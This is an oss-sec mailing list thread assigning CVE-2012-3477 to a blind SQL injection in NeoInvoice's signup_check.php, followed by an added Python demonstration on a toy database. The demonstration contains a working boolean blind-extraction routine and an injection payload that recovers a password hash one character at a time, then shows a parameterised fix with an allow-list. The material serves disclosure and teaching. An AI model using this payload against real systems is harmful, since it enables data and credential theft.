oss-sec mailing list archives
Re: CVE Request: NeoInvoice Blind SQL Injection in signup_check.php
From: Kurt Seifried <kseifried () redhat com>
Date: Fri, 10 Aug 2012 14:12:25 -0600
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 08/10/2012 02:55 AM, Adam Caudill wrote:
> All,
>
> There is a blind SQL injection issue with NeoInvoice (https://github.com/tlhunter/neoinvoice).
>
> Requester: adam () adamcaudill com
> Software: NeoInvoice
> Attack Type: Blind SQL Injection
> Vulnerable Code: https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29
> Affected Version: Current version; project doesn't seem to be using versions.
> Status: Author has been notified; awaiting a response.
>
> --
> Adam Caudill

$query = "SELECT $field FROM $table WHERE $field = '$value' LIMIT 1";

Please use CVE-2012-3477 for this issue.

- --
Kurt Seifried
Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJQJWspAAoJEBYNRVNeJnmT2bQP/1/NoF9e+FT5wvGiM6w+YsGC
cwJ1IH5LK9gNHFWJFhMtYmciBn2GJiDLa6F8Kt1sn03wG51vNJlHxsV4R3QibxeQ
hzfQRtagf43q5AUathRbriMkHMAmWnLlknoxzOuIASMLX8i9Pa/oehpzVcLrYaNA
Le6zikMr6kmjHK6uMqwr9bueiYZWn96j1WpJFCG8DVMcK5ZGpUqsBAoDW7/A8XZK
eKiBMsepFD9+MRrnXfo43BQgC6P5WaYHF0L95STs2V9Nc89OgfezaZORrxjyIe7d
8EJoVkB4TINp3QDb6GJuPoSLMEM+KKHxiozCUYuPFkMM2EH4BskuO1xLEsL6Kp4v
JrEtCQ8dSQCvQ9z34hNU1rVWgUUgDWaFrHvj8eDA6PVuOn5Ufg9v5uYrd1nkBZ1Z
H2NyG6gcsYYWB5MlUOufCXCINWPN2cZs3eQ2brRPpl78dphkX7eBldMox8U6Wswh
YErACj655d0gXEqPQhod9PjwAzRjgzh2fH8R4F5cPzOj8lsIZiYwXcOdguxn0xVY
8Ja+GtjRfJ4ImORgy9r0xdy8kijkjbDlEcfwxH9mbF1ch7ZxGeDg8IEVsqRx14x2
VHNdZgkdymRrFtm9ogB7cr6qH2ncnrXCr6HNqtMZsDdm+F8aXJar//BPWgJuQQla
wbxhM/nlsAIj/BkrDPFU
=1VHg
-----END PGP SIGNATURE-----
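The query line quoted in the thread is enough to show both why the issue is a *blind* injection and what closing it requires. What follows is an added example, not code from the thread or from NeoInvoice: it is written in Python against an in-memory SQLite database instead of the project's PHP and MySQL, and the `users` table, its columns, the stored `password_hash` value, and the assumption that signup_check.php only reveals whether a matching row exists (a yes/no availability check) are all constructed for the demonstration. It builds the same interpolated query, drives it as a boolean oracle to recover a column value one character at a time, and then shows the hardened form: the value is bound as a parameter, and because `$field` and `$table` are identifiers that cannot be bound, they are checked against a fixed allow-list before being quoted.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the application's user table (assumption: the
    real NeoInvoice schema is not shown in the thread)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, email TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'alice@example.com', 'secret-hash')")
    return db


def vulnerable_check(db, field, table, value):
    """Same query shape as the line quoted in the thread: field, table and value
    are all spliced into the SQL text. Returns True if a row matched, which is
    the only thing an availability check reveals to the caller."""
    query = f"SELECT {field} FROM {table} WHERE {field} = '{value}' LIMIT 1"
    return db.execute(query).fetchone() is not None


# Candidate characters for the blind search (constructed for this example).
CHARSET = string.ascii_letters + string.digits + "-_@."


def blind_extract(db, column, max_len=64):
    """Boolean-based blind extraction through the yes/no oracle. Each payload
    closes the opening quote, adds an OR condition on one character of the
    target column, and leaves the application's own trailing quote and
    LIMIT 1 to finish the statement, so no comment sequence is needed:
        ... WHERE username = 'x' OR substr(password_hash,1,1)='s' LIMIT 1
    """
    extracted = ""
    for pos in range(1, max_len + 1):
        for c in CHARSET:
            payload = f"x' OR substr({column},{pos},1)='{c}"
            if vulnerable_check(db, "username", "users", payload):
                extracted += c
                break
        else:
            # No candidate matched: substr() is past the end of the value.
            return extracted
    return extracted


# Identifiers cannot be bound as parameters, so they are restricted to a fixed
# allow-list of table/column pairs the endpoint is meant to query (assumption).
ALLOWED = {"users": {"username", "email"}}


def hardened_check(db, field, table, value):
    """Fix for the same check: identifiers are validated against ALLOWED and
    quoted, and the user-supplied value is bound with a placeholder."""
    if table not in ALLOWED or field not in ALLOWED[table]:
        raise ValueError(f"unexpected table/field: {table}.{field}")
    query = f'SELECT "{field}" FROM "{table}" WHERE "{field}" = ? LIMIT 1'
    return db.execute(query, (value,)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_check(db, "username", "users", "alice"))   # True: legitimate use
    print(blind_extract(db, "password_hash"))                    # secret-hash
    print(hardened_check(db, "username", "users",
                         "x' OR substr(password_hash,1,1)='s"))  # False: bound as a literal
```

Two points carry over directly to the PHP side: the payload never needs a `--` or `#` comment because it leaves the application's trailing `'` to close the string, so filtering comment sequences would not help; and a prepared statement (PDO or mysqli) only protects `$value`, so the table and column names still have to come from an allow-list rather than from the request.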
Current thread:
- CVE Request: NeoInvoice Blind SQL Injection in signup_check.php Adam Caudill (Aug 10)
- Re: CVE Request: NeoInvoice Blind SQL Injection in signup_check.php Kurt Seifried (Aug 10)